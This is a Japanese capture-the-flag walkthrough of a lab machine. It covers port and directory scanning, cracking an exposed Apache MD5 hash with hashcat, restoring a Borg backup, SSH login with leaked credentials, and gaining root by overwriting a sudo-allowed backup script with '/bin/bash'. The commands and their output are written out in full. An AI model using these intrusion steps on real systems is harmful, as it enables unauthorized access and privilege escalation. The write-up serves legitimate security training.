Scan the machine, how many ports are open?
nmapでポートスキャンする。
$ nmap 10.10.122.206
Starting Nmap 7.60 ( https://nmap.org ) at 2024-07-18 03:00 BST
Nmap scan report for ip-10-10-122-206.eu-west-1.compute.internal (10.10.122.206)
Host is up (0.0013s latency).
Not shown: 998 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 02:36:EF:6D:3F:FB (Unknown)
Nmap done: 1 IP address (1 host up) scanned in 1.80 seconds
2
What service is running on port 22?
ssh
What service is running on port 80?
http
What is the user.txt flag?
httpがあいているのでブラウザでアクセスする。
Apache2のデフォルトページが表示された。
gobusterで隠しディレクトリを探す。
$ gobuster dir -u http://10.10.122.206 -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.122.206
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2024/07/18 03:03:39 Starting gobuster
===============================================================
/.hta (Status: 403)
/.htpasswd (Status: 403)
/.htaccess (Status: 403)
/admin (Status: 301)
/etc (Status: 301)
/index.html (Status: 200)
/server-status (Status: 403)
===============================================================
2024/07/18 03:03:40 Finished
===============================================================
/etcにアクセスすると、squidディレクトリがあった。
squidディレクトリの下には以下の二つのファイルがあった。
passwd.
music_archive:$apr1$BpZ.Q.1m$F0qqPwHSOG50URuOVQTTn.
squid.conf
auth_param basic program /usr/lib64/squid/basic_ncsa_auth /etc/squid/passwd
auth_param basic children 5
auth_param basic realm Squid Basic Authentication
auth_param basic credentialsttl 2 hours
acl auth_users proxy_auth REQUIRED
http_access allow auth_users
/adminにアクセスすると、以下のようなことが書いてあった。
My music acheivements to remind me I'm cool
Setup
My name is Alex and im a music producer from The United Kingdom!
This is my office!!!
Childhood
For my entire childhood i knew i wanted to be a music artist.
I started playing the Piano at age 5.
探索すると、/admin/admin.htmlを発見した。
Admin Shoutbox
############################################
############################################
[Yesterday at 4.32pm from Josh]
Are we all going to watch the football game at the weekend??
############################################
############################################
[Yesterday at 4.33pm from Adam]
Yeah Yeah mate absolutely hope they win!
############################################
############################################
[Yesterday at 4.35pm from Josh]
See you there then mate!
############################################
############################################
[Today at 5.45am from Alex]
Ok sorry guys i think i messed something up, uhh i was playing around with the squid proxy i mentioned earlier.
I decided to give up like i always do ahahaha sorry about that.
I heard these proxy things are supposed to make your website secure but i barely know how to use it so im probably making it more insecure in the process.
Might pass it over to the IT guys but in the meantime all the config files are laying about.
And since i dont know how it works im not sure how to delete them hope they don't contain any confidential information lol.
other than that im pretty sure my backup "music_archive" is safe just to confirm.
############################################
############################################
また、/admin/archive.tarからarchive.tarという圧縮ファイルをダウンロードできた。
ls
config data hints.5 index.5 integrity.5 nonce README
dataはディレクトリで中にファイルが入っている。
READMEを読む。
README.
This is a Borg Backup repository.
See https://borgbackup.readthedocs.io/
Borg Backupとは、重複排除バックアッププログラムらしい。
borgbackupをインストール
$ sudo apt install borgbackup
Backupの復元を試みる。
まず、borg listでArchive名を確認して、borg extractで復元をする。
borg listを実行。
$ borg list /room/home/field/dev/final_archive
Enter passphrase for key /root/home/field/dev/final_archive:
パスワードを求められた。
/etc/squid/passwdにあったコレ怪しいな。
music_archive:$apr1$BpZ.Q.1m$F0qqPwHSOG50URuOVQTTn.
ただ、ハッシュ化されている。
hashcatのwikiで「$apr1$」で調べると、MD5が使われているみたい。
Hash-Modeは1600。
passwdを作成して、「\$apr1\$BpZ.Q.1m$F0qqPwHSOG50URuOVQTTn.」を書き込む。
$ nano passwd
hashcatでパスワードをクラックする。
$ hashcat -m 1600 passwd /usr/share/wordlists/rockyou.txt
hashcat (v6.1.1-66-g6a419d06) starting...
* Device #2: Outdated POCL OpenCL driver detected!
This OpenCL driver has been marked as likely to fail kernel compilation or to produce false negatives.
You can use --force to override this, but do not report related errors.
OpenCL API (OpenCL 1.2 LINUX) - Platform #1 [Intel(R) Corporation]
==================================================================
* Device #1: AMD EPYC 7571, 3832/3896 MB (974 MB allocatable), 2MCU
OpenCL API (OpenCL 1.2 pocl 1.1 None+Asserts, LLVM 6.0.0, SPIR, SLEEF, DISTRO, POCL_DEBUG) - Platform #2 [The pocl project]
===========================================================================================================================
* Device #2: pthread-AMD EPYC 7571, skipped
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Applicable optimizers applied:
* Zero-Byte
* Single-Hash
* Single-Salt
ATTENTION! Pure (unoptimized) backend kernels selected.
Using pure kernels enables cracking longer passwords but for the price of drastically reduced performance.
If you want to switch to optimized backend kernels, append -O to your commandline.
See the above message to find out about the exact limits.
Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.
Host memory required for this attack: 0 MB
Dictionary cache built:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344391
* Bytes.....: 139921497
* Keyspace..: 14344384
* Runtime...: 11 secs
$apr1$BpZ.Q.1m$F0qqPwHSOG50URuOVQTTn.:squidward
Session..........: hashcat
Status...........: Cracked
Hash.Name........: Apache $apr1$ MD5, md5apr1, MD5 (APR)
Hash.Target......: $apr1$BpZ.Q.1m$F0qqPwHSOG50URuOVQTTn.
Time.Started.....: Thu Jul 18 03:52:24 2024 (10 secs)
Time.Estimated...: Thu Jul 18 03:52:34 2024 (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 4149 H/s (7.75ms) @ Accel:128 Loops:125 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests
Progress.........: 39168/14344384 (0.27%)
Rejected.........: 0/39168 (0.00%)
Restore.Point....: 38912/14344384 (0.27%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:875-1000
Candidates.#1....: toutou -> luvhim
Started: Thu Jul 18 03:51:16 2024
Stopped: Thu Jul 18 03:52:35 2024
このパスワードと共に、Backupの復元をもう一度試みる。
$ borg list /root/home/field/dev/final_archive
Enter passphrase for key /root/home/field/dev/final_archive:
music_archive Tue, 2020-12-29 14:00:38 [f789ddb6b0ec108d130d16adebf5713c29faf19c44cad5e1eeb8ba37277b1c82]
$ borg extract /root/home/field/dev/final_archive::music_archive
Enter passphrase for key /root/home/field/dev/final_archive:
いけた。homeの下にalexというディレクトリが作成されていた。
alexの下は以下のようになっていた。
$ ls
Desktop Documents Downloads Music Pictures Public Templates Videos
それぞれのディレクトリに以下のようなファイルがあった。
Desktop/secret.txt
shoutout to all the people who have gotten to this stage whoop whoop!"
Documents/note.txt
Wow I'm awful at remembering Passwords so I've taken my Friends advice and noting them down!
alex:S3cretP@s3
ご丁寧にalexのパスワードが書いてあるので使わせていただく。
$ ssh alex@10.10.122.206
The authenticity of host '10.10.122.206 (10.10.122.206)' can't be established.
ECDSA key fingerprint is SHA256:uB5ulnLcQitH1NC30YfXJUbdLjQLRvGhDRUgCSAD7F8.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '10.10.122.206' (ECDSA) to the list of known hosts.
alex@10.10.122.206's password:
Welcome to Ubuntu 16.04.7 LTS (GNU/Linux 4.15.0-128-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
27 packages can be updated.
0 updates are security updates.
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
alex@ubuntu:~$ ls
Desktop Documents Downloads Music Pictures Public Templates user.txt Videos
alex@ubuntu:~$ cat user.txt
flag{1_hop3_y0u_ke3p_th3_arch1v3s_saf3}
ssh接続に成功して、user.txtをゲットした!
flag{1_hop3_y0u_ke3p_th3_arch1v3s_saf3}
What is the root.txt flag?
最後は権限昇格を狙う。
$ sudo -l
Matching Defaults entries for alex on ubuntu:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User alex may run the following commands on ubuntu:
(ALL : ALL) NOPASSWD: /etc/mp3backups/backup.sh
backup.shが使えそう。
権限を777にする。
$ chmod 777 /etc/mp3backups/backup.sh
中身を権限昇格用のスクリプトに書き換える。
$ echo "/bin/bash" > /etc/mp3backups/backup.sh
backup.shの実行。
$ sudo /etc/mp3backups/backup.sh
$ whoami
root
$ ls /root
root.txt
root.txtを発見した。